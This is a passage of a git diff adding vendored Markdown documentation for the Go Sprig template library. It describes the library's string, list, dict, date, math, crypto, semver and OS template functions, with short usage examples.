`int64`. If a +string is passed in, functions will attempt to convert with +`strconv.ParseInt(s, 1064)`. If this fails, the value will be treated as 0. + + - add1: Increment an integer by 1 + - add: Sum an arbitrary number of integers + - sub: Subtract the second integer from the first + - div: Divide the first integer by the second + - mod: Module of first integer divided by second + - mul: Multiply integers + - max: Return the biggest of a series of one or more integers + - min: Return the smallest of a series of one or more integers + - biggest: DEPRECATED. Return the biggest of a series of one or more integers + +Crypto Functions: + + - genPrivateKey: Generate a private key for the given cryptosystem. If no + argument is supplied, by default it will generate a private key using + the RSA algorithm. Accepted values are `rsa`, `dsa`, and `ecdsa`. + - derivePassword: Derive a password from the given parameters according to the ["Master Password" algorithm](http://masterpasswordapp.com/algorithm.html) + Given parameters (in order) are: + `counter` (starting with 1), `password_type` (maximum, long, medium, short, basic, or pin), `password`, + `user`, and `site` + +SemVer Functions: + +These functions provide version parsing and comparisons for SemVer 2 version +strings. + + - semver: Parse a semantic version and return a Version object. + - semverCompare: Compare a SemVer range to a particular version. +*/ +package sprig diff --git a/vendor/github.com/Masterminds/sprig/docs/_config.yml b/vendor/github.com/Masterminds/sprig/docs/_config.yml new file mode 100644 index 0000000000..c741881743 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/docs/_config.yml @@ -0,0 +1 @@ +theme: jekyll-theme-slate \ No newline at end of file diff --git a/vendor/github.com/Masterminds/sprig/docs/conversion.md b/vendor/github.com/Masterminds/sprig/docs/conversion.md new file mode 100644 index 0000000000..06f4f77680 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/docs/conversion.md @@ -0,0 +1,25 @@ +# Type Conversion Functions + +The following type conversion functions are provided by Sprig: + +- `atoi`: Convert a string to an integer +- `float64`: Convert to a float64 +- `int`: Convert to an `int` at the system's width. +- `int64`: Convert to an `int64` +- `toString`: Convert to a string +- `toStrings`: Convert a list, slice, or array to a list of strings. + +Only `atoi` requires that the input be a specific type. The others will attempt +to convert from any type to the destination type. For example, `int64` can convert +floats to ints, and it can also convert strings to ints. + +## toStrings + +Given a list-like collection, produce a slice of strings. + +``` +list 1 2 3 | toStrings +``` + +The above converts `1` to `"1"`, `2` to `"2"`, and so on, and then returns +them as a list. diff --git a/vendor/github.com/Masterminds/sprig/docs/crypto.md b/vendor/github.com/Masterminds/sprig/docs/crypto.md new file mode 100644 index 0000000000..a927a45b78 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/docs/crypto.md @@ -0,0 +1,133 @@ +# Cryptographic and Security Functions + +Sprig provides a couple of advanced cryptographic functions. + +## sha1sum + +The `sha1sum` function receives a string, and computes it's SHA1 digest. + +``` +sha1sum "Hello world!" +``` + +## sha256sum + +The `sha256sum` function receives a string, and computes it's SHA256 digest. + +``` +sha256sum "Hello world!" +``` + +The above will compute the SHA 256 sum in an "ASCII armored" format that is +safe to print. + +## derivePassword + +The `derivePassword` function can be used to derive a specific password based on +some shared "master password" constraints. The algorithm for this is +[well specified](http://masterpasswordapp.com/algorithm.html). + +``` +derivePassword 1 "long" "password" "user" "example.com" +``` + +Note that it is considered insecure to store the parts directly in the template. + +## genPrivateKey + +The `genPrivateKey` function generates a new private key encoded into a PEM +block. + +It takes one of the values for its first param: + +- `ecdsa`: Generate an elyptical curve DSA key (P256) +- `dsa`: Generate a DSA key (L2048N256) +- `rsa`: Generate an RSA 4096 key + +## buildCustomCert + +The `buildCustomCert` function allows customizing the certificate. + +It takes the following string parameters: + +- A base64 encoded PEM format certificate +- A base64 encoded PEM format private key + +It returns a certificate object with the following attributes: + +- `Cert`: A PEM-encoded certificate +- `Key`: A PEM-encoded private key + +Example: + +``` +$ca := buildCustomCert "base64-encoded-ca-key" "base64-encoded-ca-crt" +``` + +Note that the returned object can be passed to the `genSignedCert` function +to sign a certificate using this CA. + +## genCA + +The `genCA` function generates a new, self-signed x509 certificate authority. + +It takes the following parameters: + +- Subject's common name (cn) +- Cert validity duration in days + +It returns an object with the following attributes: + +- `Cert`: A PEM-encoded certificate +- `Key`: A PEM-encoded private key + +Example: + +``` +$ca := genCA "foo-ca" 365 +``` + +Note that the returned object can be passed to the `genSignedCert` function +to sign a certificate using this CA. + +## genSelfSignedCert + +The `genSelfSignedCert` function generates a new, self-signed x509 certificate. + +It takes the following parameters: + +- Subject's common name (cn) +- Optional list of IPs; may be nil +- Optional list of alternate DNS names; may be nil +- Cert validity duration in days + +It returns an object with the following attributes: + +- `Cert`: A PEM-encoded certificate +- `Key`: A PEM-encoded private key + +Example: + +``` +$cert := genSelfSignedCert "foo.com" (list "10.0.0.1" "10.0.0.2") (list "bar.com" "bat.com") 365 +``` + +## genSignedCert + +The `genSignedCert` function generates a new, x509 certificate signed by the +specified CA. + +It takes the following parameters: + +- Subject's common name (cn) +- Optional list of IPs; may be nil +- Optional list of alternate DNS names; may be nil +- Cert validity duration in days +- CA (see `genCA`) + +Example: + +``` +$ca := genCA "foo-ca" 365 +$cert := genSignedCert "foo.com" (list "10.0.0.1" "10.0.0.2") (list "bar.com" "bat.com") 365 $ca +``` diff --git a/vendor/github.com/Masterminds/sprig/docs/date.md b/vendor/github.com/Masterminds/sprig/docs/date.md new file mode 100644 index 0000000000..9a4f673503 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/docs/date.md @@ -0,0 +1,88 @@ +# Date Functions + +## now + +The current date/time. Use this in conjunction with other date functions. + + +## ago + +The `ago` function returns duration from time.Now in seconds resolution. + +``` +ago .CreatedAt" +``` +returns in `time.Duration` String() format + +``` +2h34m7s +``` + +## date + +The `date` function formats a date. + + +Format the date to YEAR-MONTH-DAY: +``` +now | date "2006-01-02" +``` + +Date formatting in Go is a [little bit different](https://pauladamsmith.com/blog/2011/05/go_time.html). + +In short, take this as the base date: + +``` +Mon Jan 2 15:04:05 MST 2006 +``` + +Write it in the format you want. Above, `2006-01-02` is the same date, but +in the format we want. + +## dateInZone + +Same as `date`, but with a timezone. + +``` +date "2006-01-02" (now) "UTC" +``` + +## dateModify + +The `dateModify` takes a modification and a date and returns the timestamp. + +Subtract an hour and thirty minutes from the current time: + +``` +now | date_modify "-1.5h" +``` + +## htmlDate + +The `htmlDate` function formates a date for inserting into an HTML date picker +input field. + +``` +now | htmlDate +``` + +## htmlDateInZone + +Same as htmlDate, but with a timezone. + +``` +htmlDate (now) "UTC" +``` + +## toDate + +`toDate` converts a string to a date. The first argument is the date layout and +the second the date string. If the string can't be convert it returns the zero +value. + +This is useful when you want to convert a string date to another format +(using pipe). The example below converts "2017-12-31" to "31/12/2017". + +``` +toDate "2006-01-02" "2017-12-31" | date "02/01/2006" +``` diff --git a/vendor/github.com/Masterminds/sprig/docs/defaults.md b/vendor/github.com/Masterminds/sprig/docs/defaults.md new file mode 100644 index 0000000000..c0cae90e53 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/docs/defaults.md @@ -0,0 +1,113 @@ +# Default Functions + +Sprig provides tools for setting default values for templates. + +## default + +To set a simple default value, use `default`: + +``` +default "foo" .Bar +``` + +In the above, if `.Bar` evaluates to a non-empty value, it will be used. But if +it is empty, `foo` will be returned instead. + +The definition of "empty" depends on type: + +- Numeric: 0 +- String: "" +- Lists: `[]` +- Dicts: `{}` +- Boolean: `false` +- And always `nil` (aka null) + +For structs, there is no definition of empty, so a struct will never return the +default. + +## empty + +The `empty` function returns `true` if the given value is considered empty, and +`false` otherwise. The empty values are listed in the `default` section. + +``` +empty .Foo +``` + +Note that in Go template conditionals, emptiness is calculated for you. Thus, +you rarely need `if empty .Foo`. Instead, just use `if .Foo`. + +## coalesce + +The `coalesce` function takes a list of values and returns the first non-empty +one. + +``` +coalesce 0 1 2 +``` + +The above returns `1`. + +This function is useful for scanning through multiple variables or values: + +``` +coalesce .name .parent.name "Matt" +``` + +The above will first check to see if `.name` is empty. If it is not, it will return +that value. If it _is_ empty, `coalesce` will evaluate `.parent.name` for emptiness. +Finally, if both `.name` and `.parent.name` are empty, it will return `Matt`. + +## toJson + +The `toJson` function encodes an item into a JSON string. + +``` +toJson .Item +``` + +The above returns JSON string representation of `.Item`. + +## toPrettyJson + +The `toPrettyJson` function encodes an item into a pretty (indented) JSON string. + +``` +toPrettyJson .Item +``` + +The above returns indented JSON string representation of `.Item`. + +## ternary + +The `ternary` function takes two values, and a test value. If the test value is +true, the first value will be returned. If the test value is empty, the second +value will be returned. This is similar to the c ternary operator. + +### true test value + +``` +ternary "foo" "bar" true +``` + +or + +``` +true | ternary "foo" "bar" +``` + +The above returns `"foo"`. + +### false test value + +``` +ternary "foo" "bar" false +``` + +or + +``` +false | ternary "foo" "bar" +``` + +The above returns `"bar"`. diff --git a/vendor/github.com/Masterminds/sprig/docs/dicts.md b/vendor/github.com/Masterminds/sprig/docs/dicts.md new file mode 100644 index 0000000000..cfd3e27a2a --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/docs/dicts.md @@ -0,0 +1,131 @@ +# Dictionaries and Dict Functions + +Sprig provides a key/value storage type called a `dict` (short for "dictionary", +as in Python). A `dict` is an _unorder_ type. + +The key to a dictionary **must be a string**. However, the value can be any +type, even another `dict` or `list`. + +Unlike `list`s, `dict`s are not immutable. The `set` and `unset` functions will +modify the contents of a dictionary. + +## dict + +Creating dictionaries is done by calling the `dict` function and passing it a +list of pairs. + +The following creates a dictionary with three items: + +``` +$myDict := dict "name1" "value1" "name2" "value2" "name3" "value 3" +``` + +## set + +Use `set` to add a new key/value pair to a dictionary. + +``` +$_ := set $myDict "name4" "value4" +``` + +Note that `set` _returns the dictionary_ (a requirement of Go template functions), +so you may need to trap the value as done above with the `$_` assignment. + +## unset + +Given a map and a key, delete the key from the map. + +``` +$_ := unset $myDict "name4" +``` + +As with `set`, this returns the dictionary. + +Note that if the key is not found, this operation will simply return. No error +will be generated. + +## hasKey + +The `hasKey` function returns `true` if the given dict contains the given key. + +``` +hasKey $myDict "name1" +``` + +If the key is not found, this returns `false`. + +## pluck + +The `pluck` function makes it possible to give one key and multiple maps, and +get a list of all of the matches: + +``` +pluck "name1" $myDict $myOtherDict +``` + +The above will return a `list` containing every found value (`[value1 otherValue1]`). + +If the give key is _not found_ in a map, that map will not have an item in the +list (and the length of the returned list will be less than the number of dicts +in the call to `pluck`. + +If the key is _found_ but the value is an empty value, that value will be +inserted. + +A common idiom in Sprig templates is to uses `pluck... | first` to get the first +matching key out of a collection of dictionaries. + +## merge + +Merge two or more dictionaries into one, giving precedence to the dest dictionary: + +``` +$newdict := merge $dest $source1 $source2 +``` + +This is a deep merge operation. + +## keys + +The `keys` function will return a `list` of all of the keys in one or more `dict` +types. Since a dictionary is _unordered_, the keys will not be in a predictable order. +They can be sorted with `sortAlpha`. + +``` +keys $myDict | sortAlpha +``` + +When supplying multiple dictionaries, the keys will be concatenated. Use the `uniq` +function along with `sortAlpha` to get a unqiue, sorted list of keys. + +``` +keys $myDict $myOtherDict | uniq | sortAlpha +``` + +## pick + +The `pick` function selects just the given keys out of a dictionary, creating a +new `dict`. + +``` +$new := pick $myDict "name1" "name3" +``` + +The above returns `{name1: value1, name2: value2}` + +## omit + +The `omit` function is similar to `pick`, except it returns a new `dict` with all +the keys that _do not_ match the given keys. + +``` +$new := omit $myDict "name1" "name3" +``` + +The above returns `{name2: value2}` + +## A Note on Dict Internals + +A `dict` is implemented in Go as a `map[string]interface{}`. Go developers can +pass `map[string]interface{}` values into the context to make them available +to templates as `dict`s. diff --git a/vendor/github.com/Masterminds/sprig/docs/encoding.md b/vendor/github.com/Masterminds/sprig/docs/encoding.md new file mode 100644 index 0000000000..1c7a36f849 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/docs/encoding.md @@ -0,0 +1,6 @@ +# Encoding Functions + +Sprig has the following encoding and decoding functions: + +- `b64enc`/`b64dec`: Encode or decode with Base64 +- `b32enc`/`b32dec`: Encode or decode with Base32 diff --git a/vendor/github.com/Masterminds/sprig/docs/flow_control.md b/vendor/github.com/Masterminds/sprig/docs/flow_control.md new file mode 100644 index 0000000000..6414640a6a --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/docs/flow_control.md @@ -0,0 +1,11 @@ +# Flow Control Functions + +## fail + +Unconditionally returns an empty `string` and an `error` with the specified +text. This is useful in scenarios where other conditionals have determined that +template rendering should fail. + +``` +fail "Please accept the end user license agreement" +``` diff --git a/vendor/github.com/Masterminds/sprig/docs/index.md b/vendor/github.com/Masterminds/sprig/docs/index.md new file mode 100644 index 0000000000..24e17d89cc --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/docs/index.md @@ -0,0 +1,23 @@ +# Sprig Function Documentation + +The Sprig library provides over 70 template functions for Go's template language. + +- [String Functions](strings.md): `trim`, `wrap`, `randAlpha`, `plural`, etc. + - [String List Functions](string_slice.md): `splitList`, `sortAlpha`, etc. +- [Math Functions](math.md): `add`, `max`, `mul`, etc. + - [Integer Slice Functions](integer_slice.md): `until`, `untilStep` +- [Date Functions](date.md): `now`, `date`, etc. +- [Defaults Functions](defaults.md): `default`, `empty`, `coalesce`, `toJson`, `toPrettyJson` +- [Encoding Functions](encoding.md): `b64enc`, `b64dec`, etc. +- [Lists and List Functions](lists.md): `list`, `first`, `uniq`, etc. +- [Dictionaries and Dict Functions](dicts.md): `dict`, `hasKey`, `pluck`, etc. +- [Type Conversion Functions](conversion.md): `atoi`, `int64`, `toString`, etc. +- [File Path Functions](paths.md): `base`, `dir`, `ext`, `clean`, `isAbs` +- [Flow Control Functions](flow_control.md): `fail` +- Advanced Functions + - [UUID Functions](uuid.md): `uuidv4` + - [OS Functions](os.md): `env`, `expandenv` + - [Version Comparison Functions](semver.md): `semver`, `semverCompare` + - [Reflection](reflection.md): `typeOf`, `kindIs`, `typeIsLike`, etc. + - [Cryptographic and Security Functions](crypto.md): `derivePassword`, `sha256sum`, `genPrivateKey` + diff --git a/vendor/github.com/Masterminds/sprig/docs/integer_slice.md b/vendor/github.com/Masterminds/sprig/docs/integer_slice.md new file mode 100644 index 0000000000..8929d30363 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/docs/integer_slice.md @@ -0,0 +1,25 @@ +# Integer Slice Functions + +## until + +The `until` function builds a range of integers. + +``` +until 5 +``` + +The above generates the list `[0, 1, 2, 3, 4]`. + +This is useful for looping with `range $i, $e := until 5`. + +## untilStep + +Like `until`, `untilStep` generates a list of counting integers. But it allows +you to define a start, stop, and step: + +``` +untilStep 3 6 2 +``` + +The above will produce `[3 5]` by starting with 3, and adding 2 until it is equal +or greater than 6. This is similar to Python's `range` function. diff --git a/vendor/github.com/Masterminds/sprig/docs/lists.md b/vendor/github.com/Masterminds/sprig/docs/lists.md new file mode 100644 index 0000000000..22441cec54 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/docs/lists.md @@ -0,0 +1,111 @@ +# Lists and List Functions + +Sprig provides a simple `list` type that can contain arbitrary sequential lists +of data. This is similar to arrays or slices, but lists are designed to be used +as immutable data types. + +Create a list of integers: + +``` +$myList := list 1 2 3 4 5 +``` + +The above creates a list of `[1 2 3 4 5]`. + +## first + +To get the head item on a list, use `first`. + +`first $myList` returns `1` + +## rest + +To get the tail of the list (everything but the first item), use `rest`. + +`rest $myList` returns `[2 3 4 5]` + +## last + +To get the last item on a list, use `last`: + +`last $myList` returns `5`. This is roughly analogous to reversing a list and +then calling `first`. + +## initial + +This compliments `last` by returning all _but_ the last element. +`initial $myList` returns `[1 2 3 4]`. + +## append + +Append a new item to an existing list, creating a new list. + +``` +$new = append $myList 6 +``` + +The above would set `$new` to `[1 2 3 4 5 6]`. `$myList` would remain unaltered. + +## prepend + +Push an alement onto the front of a list, creating a new list. + +``` +prepend $myList 0 +``` + +The above would produce `[0 1 2 3 4 5]`. `$myList` would remain unaltered. + +## reverse + +Produce a new list with the reversed elements of the given list. + +``` +reverse $myList +``` + +The above would generate the list `[5 4 3 2 1]`. + +## uniq + +Generate a list with all of the duplicates removed. + +``` +list 1 1 1 2 | uniq +``` + +The above would produce `[1 2]` + +## without + +The `without` function filters items out of a list. + +``` +without $myList 3 +``` + +The above would produce `[1 2 4 5]` + +Without can take more than one filter: + +``` +without $myList 1 3 5 +``` + +That would produce `[2 4]` + +## has + +Test to see if a list has a particular element. + +``` +has $myList 4 +``` + +The above would return `true`, while `has $myList "hello"` would return false. + +## A Note on List Internals + +A list is implemented in Go as a `[]interface{}`. For Go developers embedding +Sprig, you may pass `[]interface{}` items into your template context and be +able to use all of the `list` functions on those items. diff --git a/vendor/github.com/Masterminds/sprig/docs/math.md b/vendor/github.com/Masterminds/sprig/docs/math.md new file mode 100644 index 0000000000..95f2f1e599 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/docs/math.md @@ -0,0 +1,63 @@ +# Math Functions + +All math functions operate on `int64` values unless specified otherwise. + +(In the future, these will be extended to handle floats as well) + +## add + +Sum numbers with `add` + +## add1 + +To increment by 1, use `add1` + +## sub + +To subtract, use `sub` + +## div + +Perform integer division with `div` + +## mod + +Modulo with `mod` + +## mul + +Multiply with `mul` + +## max + +Return the largest of a series of integers: + +This will return `3`: + +``` +max 1 2 3 +``` + +## min + +Return the smallest of a series of integers. + +`min 1 2 3` will return `1`. + +## floor + +Returns the greatest float value less than or equal to input value + +`floor 123.9999` will return `123.0` + +## ceil + +Returns the greatest float value greater than or equal to input value + +`ceil 123.001` will return `124.0` + +## round + +Returns a float value with the remainder rounded to the given number to digits after the decimal point. + +`round 123.555555` will return `123.556` \ No newline at end of file diff --git a/vendor/github.com/Masterminds/sprig/docs/os.md b/vendor/github.com/Masterminds/sprig/docs/os.md new file mode 100644 index 0000000000..e4c197ad04 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/docs/os.md @@ -0,0 +1,24 @@ +# OS Functions + +_WARNING:_ These functions can lead to information leakage if not used +appropriately. + +_WARNING:_ Some notable implementations of Sprig (such as +[Kubernetes Helm](http://helm.sh) _do not provide these functions for security +reasons_. + +## env + +The `env` function reads an environment variable: + +``` +env "HOME" +``` + +## expandenv + +To substitute environment variables in a string, use `expandenv`: + +``` +expandenv "Your path is set to $PATH" +``` diff --git a/vendor/github.com/Masterminds/sprig/docs/paths.md b/vendor/github.com/Masterminds/sprig/docs/paths.md new file mode 100644 index 0000000000..87ec6d45a2 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/docs/paths.md @@ -0,0 +1,43 @@ +# File Path Functions + +While Sprig does not grant access to the filesystem, it does provide functions +for working with strings that follow file path conventions. + +# base + +Return the last element of a path. + +``` +base "foo/bar/baz" +``` + +The above prints "baz" + +# dir + +Return the directory, stripping the last part of the path. So `dir "foo/bar/baz"` +returns `foo/bar` + +# clean + +Clean up a path. + +``` +clean "foo/bar/../baz" +``` + +The above resolves the `..` and returns `foo/baz` + +# ext + +Return the file extension. + +``` +ext "foo.bar" +``` + +The above returns `.bar`. + +# isAbs + +To check whether a file path is absolute, use `isAbs`. diff --git a/vendor/github.com/Masterminds/sprig/docs/reflection.md b/vendor/github.com/Masterminds/sprig/docs/reflection.md new file mode 100644 index 0000000000..597871f3c5 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/docs/reflection.md @@ -0,0 +1,38 @@ +# Reflection Functions + +Sprig provides rudimentary reflection tools. These help advanced template +developers understand the underlying Go type information for a particular value. + +Go has several primitive _kinds_, like `string`, `slice`, `int64`, and `bool`. + +Go has an open _type_ system that allows developers to create their own types. + +Sprig provides a set of functions for each. + +## Kind Functions + +There are two Kind functions: `kindOf` returns the kind of an object. + +``` +kindOf "hello" +``` + +The above would return `string`. For simple tests (like in `if` blocks), the +`isKind` function will let you verify that a value is a particular kind: + +``` +kindIs "int" 123 +``` + +The above will return `true` + +## Type Functions + +Types are slightly harder to work with, so there are three different functions: + +- `typeOf` returns the underlying type of a value: `typeOf $foo` +- `typeIs` is like `kindIs`, but for types: `typeIs "*io.Buffer" $myVal` +- `typeIsLike` works as `kindIs`, except that it also dereferences pointers. + +**Note:** None of these can test whether or not something implements a given +interface, since doing so would require compiling the interface in ahead of time. diff --git a/vendor/github.com/Masterminds/sprig/docs/semver.md b/vendor/github.com/Masterminds/sprig/docs/semver.md new file mode 100644 index 0000000000..e0cbfeb7ae --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/docs/semver.md @@ -0,0 +1,124 @@ +# Semantic Version Functions + +Some version schemes are easily parseable and comparable. Sprig provides functions +for working with [SemVer 2](http://semver.org) versions. + +## semver + +The `semver` function parses a string into a Semantic Version: + +``` +$version := semver "1.2.3-alpha.1+123" +``` + +_If the parser fails, it will cause template execution to halt with an error._ + +At this point, `$version` is a pointer to a `Version` object with the following +properties: + +- `$version.Major`: The major number (`1` above) +- `$version.Minor`: The minor number (`2` above) +- `$version.Patch`: The patch number (`3` above) +- `$version.Prerelease`: The prerelease (`alpha.1` above) +- `$version.Metadata`: The build metadata (`123` above) +- `$version.Original`: The original version as a string + +Additionally, you can compare a `Version` to another `version` using the `Compare` +function: + +``` +semver "1.4.3" | (semver "1.2.3").Compare +``` + +The above will return `-1`. + +The return values are: + +- `-1` if the given semver is greater than the semver whose `Compare` method was called +- `1` if the version who's `Compare` function was called is greater. +- `0` if they are the same version + +(Note that in SemVer, the `Metadata` field is not compared during version +comparison operations.) + + +## semverCompare + +A more robust comparison function is provided as `semverCompare`. This version +supports version ranges: + +- `semverCompare "1.2.3" "1.2.3"` checks for an exact match +- `semverCompare "^1.2.0" "1.2.3"` checks that the major and minor versions match, and that the patch + number of the second version is _greater than or equal to_ the first parameter. + +The SemVer functions use the [Masterminds semver library](https://github.com/Masterminds/semver), +from the creators of Sprig. + + +## Basic Comparisons + +There are two elements to the comparisons. First, a comparison string is a list +of comma separated and comparisons. These are then separated by || separated or +comparisons. For example, `">= 1.2, < 3.0.0 || >= 4.2.3"` is looking for a +comparison that's greater than or equal to 1.2 and less than 3.0.0 or is +greater than or equal to 4.2.3. + +The basic comparisons are: + +* `=`: equal (aliased to no operator) +* `!=`: not equal +* `>`: greater than +* `<`: less than +* `>=`: greater than or equal to +* `<=`: less than or equal to + +_Note, according to the Semantic Version specification pre-releases may not be +API compliant with their release counterpart. It says,_ + +> _A pre-release version indicates that the version is unstable and might not satisfy the intended compatibility requirements as denoted by its associated normal version._ + +_SemVer comparisons without a pre-release value will skip pre-release versions. +For example, `>1.2.3` will skip pre-releases when looking at a list of values +while `>1.2.3-alpha.1` will evaluate pre-releases._ + +## Hyphen Range Comparisons + +There are multiple methods to handle ranges and the first is hyphens ranges. +These look like: + +* `1.2 - 1.4.5` which is equivalent to `>= 1.2, <= 1.4.5` +* `2.3.4 - 4.5` which is equivalent to `>= 2.3.4, <= 4.5` + +## Wildcards In Comparisons + +The `x`, `X`, and `*` characters can be used as a wildcard character. This works +for all comparison operators. When used on the `=` operator it falls +back to the pack level comparison (see tilde below). For example, + +* `1.2.x` is equivalent to `>= 1.2.0, < 1.3.0` +* `>= 1.2.x` is equivalent to `>= 1.2.0` +* `<= 2.x` is equivalent to `<= 3` +* `*` is equivalent to `>= 0.0.0` + +## Tilde Range Comparisons (Patch) + +The tilde (`~`) comparison operator is for patch level ranges when a minor +version is specified and major level changes when the minor number is missing. +For example, + +* `~1.2.3` is equivalent to `>= 1.2.3, < 1.3.0` +* `~1` is equivalent to `>= 1, < 2` +* `~2.3` is equivalent to `>= 2.3, < 2.4` +* `~1.2.x` is equivalent to `>= 1.2.0, < 1.3.0` +* `~1.x` is equivalent to `>= 1, < 2` + +## Caret Range Comparisons (Major) + +The caret (`^`) comparison operator is for major level changes. This is useful +when comparisons of API versions as a major change is API breaking. For example, + +* `^1.2.3` is equivalent to `>= 1.2.3, < 2.0.0` +* `^1.2.x` is equivalent to `>= 1.2.0, < 2.0.0` +* `^2.3` is equivalent to `>= 2.3, < 3` +* `^2.x` is equivalent to `>= 2.0.0, < 3` + diff --git a/vendor/github.com/Masterminds/sprig/docs/string_slice.md b/vendor/github.com/Masterminds/sprig/docs/string_slice.md new file mode 100644 index 0000000000..25643ec1c1 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/docs/string_slice.md @@ -0,0 +1,55 @@ +# String Slice Functions + +These function operate on or generate slices of strings. In Go, a slice is a +growable array. In Sprig, it's a special case of a `list`. + +## join + +Join a list of strings into a single string, with the given separator. + +``` +list "hello" "world" | join "_" +``` + +The above will produce `hello_world` + +`join` will try to convert non-strings to a string value: + +``` +list 1 2 3 | join "+" +``` + +The above will produce `1+2+3` + +## splitList and split + +Split a string into a list of strings: + +``` +splitList "$" "foo$bar$baz" +``` + +The above will return `[foo bar baz]` + +The older `split` function splits a string into a `dict`. It is designed to make +it easy to use template dot notation for accessing members: + +``` +$a := split "$" "foo$bar$baz" +``` + +The above produces a map with index keys. `{_0: foo, _1: bar, _2: baz}` + +``` +$a._0 +``` + +The above produces `foo` + +## sortAlpha + +The `sortAlpha` function sorts a list of strings into alphabetical (lexicographical) +order. + +It does _not_ sort in place, but returns a sorted copy of the list, in keeping +with the immutability of lists. diff --git a/vendor/github.com/Masterminds/sprig/docs/strings.md b/vendor/github.com/Masterminds/sprig/docs/strings.md new file mode 100644 index 0000000000..8deb4cf6b0 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/docs/strings.md @@ -0,0 +1,397 @@ +# String Functions + +Sprig has a number of string manipulation functions. + +## trim + +The `trim` function removes space from either side of a string: + +``` +trim " hello " +``` + +The above produces `hello` + +## trimAll + +Remove given characters from the front or back of a string: + +``` +trimAll "$" "$5.00" +``` + +The above returns `5.00` (as a string). + +## trimSuffix + +Trim just the suffix from a string: + +``` +trimSuffix "-" "hello-" +``` + +The above returns `hello` + +## upper + +Convert the entire string to uppercase: + +``` +upper "hello" +``` + +The above returns `HELLO` + +## lower + +Convert the entire string to lowercase: + +``` +lower "HELLO" +``` + +The above returns `hello` + +## title + +Convert to title case: + +``` +title "hello world" +``` + +The above returns `Hello World` + +## untitle + +Remove title casing. `untitle "Hello World"` produces `hello world`. + +## repeat + +Repeat a string multiple times: + +``` +repeat 3 "hello" +``` + +The above returns `hellohellohello` + +## substr + +Get a substring from a string. It takes three parameters: + +- start (int) +- length (int) +- string (string) + +``` +substr 0 5 "hello world" +``` + +The above returns `hello` + +## nospace + +Remove all whitespace from a string. + +``` +nospace "hello w o r l d" +``` + +The above returns `helloworld` + +## trunc + +Truncate a string (and add no suffix) + +``` +trunc 5 "hello world" +``` + +The above produces `hello`. + +## abbrev + +Truncate a string with ellipses (`...`) + +Parameters: +- max length +- the string + +``` +abbrev 5 "hello world" +``` + +The above returns `he...`, since it counts the width of the ellipses against the +maximum length. + +## abbrevboth + +Abbreviate both sides: + +``` +abbrevboth 5 10 "1234 5678 9123" +``` + +the above produces `...5678...` + +It takes: + +- left offset +- max length +- the string + +## initials + +Given multiple words, take the first letter of each word and combine. + +``` +initials "First Try" +``` + +The above returns `FT` + +## randAlphaNum, randAlpha, randNumeric, and randAscii + +These four functions generate random strings, but with different base character +sets: + +- `randAlphaNum` uses `0-9a-zA-Z` +- `randAlpha` uses `a-zA-Z` +- `randNumeric` uses `0-9` +- `randAscii` uses all printable ASCII characters + +Each of them takes one parameter: the integer length of the string. + +``` +randNumeric 3 +``` + +The above will produce a random string with three digits. + +## wrap + +Wrap text at a given column count: + +``` +wrap 80 $someText +``` + +The above will wrap the string in `$someText` at 80 columns. + +## wrapWith + +`wrapWith` works as `wrap`, but lets you specify the string to wrap with. +(`wrap` uses `\n`) + +``` +wrapWith 5 "\t" "Hello World" +``` + +The above produces `hello world` (where the whitespace is an ASCII tab +character) + +## contains + +Test to see if one string is contained inside of another: + +``` +contains "cat" "catch" +``` + +The above returns `true` because `catch` contains `cat`. + +## hasPrefix and hasSuffix + +The `hasPrefix` and `hasSuffix` functions test whether a string has a given +prefix or suffix: + +``` +hasPrefix "cat" "catch" +``` + +The above returns `true` because `catch` has the prefix `cat`. + +## quote and squote + +These functions wrap a string in double quotes (`quote`) or single quotes +(`squote`). + +## cat + +The `cat` function concatenates multiple strings together into one, separating +them with spaces: + +``` +cat "hello" "beautiful" "world" +``` + +The above produces `hello beautiful world` + +## indent + +The `indent` function indents every line in a given string to the specified +indent width. This is useful when aligning multi-line strings: + +``` +indent 4 $lots_of_text +``` + +The above will indent every line of text by 4 space characters. + +## nindent + +The `nindent` function is the same as the indent function, but prepends a new +line to the beginning of the string. + +``` +nindent 4 $lots_of_text +``` + +The above will indent every line of text by 4 space characters and add a new +line to the beginning. + +## replace + +Perform simple string replacement. + +It takes three arguments: + +- string to replace +- string to replace with +- source string + +``` +"I Am Henry VIII" | replace " " "-" +``` + +The above will produce `I-Am-Henry-VIII` + +## plural + +Pluralize a string. + +``` +len $fish | plural "one anchovy" "many anchovies" +``` + +In the above, if the length of the string is 1, the first argument will be +printed (`one anchovy`). Otherwise, the second argument will be printed +(`many anchovies`). + +The arguments are: + +- singular string +- plural string +- length integer + +NOTE: Sprig does not currently support languages with more complex pluralization +rules. And `0` is considered a plural because the English language treats it +as such (`zero anchovies`). The Sprig developers are working on a solution for +better internationalization. + +## snakecase + +Convert string from camelCase to snake_case. + +Introduced in 2.12.0. + +``` +snakecase "FirstName" +``` + +This above will produce `first_name`. + +## camelcase + +Convert string from snake_case to CamelCase + +Introduced in 2.12.0. + +``` +camelcase "http_server" +``` + +This above will produce `HttpServer`. + +## shuffle + +Shuffle a string. + +Introduced in 2.12.0. + + +``` +shuffle "hello" +``` + +The above will randomize the letters in `hello`, perhaps producing `oelhl`. + +## regexMatch + +Returns true if the input string mratches the regular expression. + +``` +regexMatch "[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\\.[A-Za-z]{2,}" "test@acme.com" +``` + +The above produces `true` + +## regexFindAll + +Returns a slice of all matches of the regular expression in the input string + +``` +regexFindAll "[2,4,6,8]" "123456789 +``` + +The above produces `[2 4 6 8]` + +## regexFind + +Return the first (left most) match of the regular 